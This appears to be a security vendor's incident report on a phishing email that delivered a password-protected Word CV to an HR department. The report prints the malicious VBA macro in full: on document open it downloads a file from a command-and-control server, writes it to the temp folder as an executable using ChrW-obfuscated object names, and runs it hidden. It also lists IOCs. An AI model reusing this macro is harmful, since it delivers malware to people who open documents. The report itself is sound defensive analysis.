Incident Report: CV or Cyber Vector?

In this post we discuss how a cyber attack involving malicious macro code was disguised as a CV delivered via email.

Perception Point Incident Response

Malicious Activity: Would You Hire a Hacker?

Would you? One of our client’s HR department received an email containing a CV. The email stated that the attached word document is password protected and provided the password inside the email. The user has to enter the password manually, a process that can cause issues to an automated system that check the file for malicious activity.

After the user enters the password the file becomes a common attack of a malicious macro code that executes malicious commands. The macro code is also encrypted making the detection even harder.

Perception Point’s file decryption feature that extracts the malicious code from an encrypted file. The code downloads a malicious exe to the temp folder from a server and activates it.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
WinHttpReq.send
Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    second5 = ChrW(97) & ChrW(109)
    last5 = first5 + second5
xyuhjnx = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Open
    oStream.Type = Val("1FFF")
    oStream.Write WinHttpReq.responseBody
    
    Dim first6 As String
    Dim last6 As String
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    
    oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
    oStream.Close
    
End If
 
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub

IOC’s

C2 Server IP - 209.141.55.226
qwerty2.exe - 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (SHA-256) VT score 12/69 2019-02-21 15:13:33 UTC

Learn more about how we protect our clients against malicious activity here.

Learn more about protecting your organization in our detailed guide to cyber security strategy.

Don't miss out on any industry updates.

Sign up for our newsletter!

TALK TO SALES

Incident Report: CV or Cyber Vector?

Malicious Activity: Would You Hire a Hacker?

IOC’s

Don't miss out on any industry updates.

Sign up for our newsletter!

Ready to Try
Perception Point?

Learn More

Nespress-Oh No! Phishing Attack Exploits Nespresso Open Redirect Vulnerability

Professionally Hooked: Microsoft Two-Step Phishing Campaign Targets LinkedIn Users

Behind the Attack: Evasive HTML Spear Phishing

Evolving Email Security with Embedding Space and AI-powered Subject Analyzer

Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT

Boosting Perception Point’s Incident Response Service with GPThreat Hunter™

Incident Report: CV or Cyber Vector?

Malicious Activity: Would You Hire a Hacker?

IOC’s

Don't miss out on any industry updates.

Sign up for our newsletter!

Ready to Try Perception Point?

Learn More

Nespress-Oh No! Phishing Attack Exploits Nespresso Open Redirect Vulnerability

Professionally Hooked: Microsoft Two-Step Phishing Campaign Targets LinkedIn Users

Behind the Attack: Evasive HTML Spear Phishing

Evolving Email Security with Embedding Space and AI-powered Subject Analyzer

Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT

Boosting Perception Point’s Incident Response Service with GPThreat Hunter™

Ready to Try
Perception Point?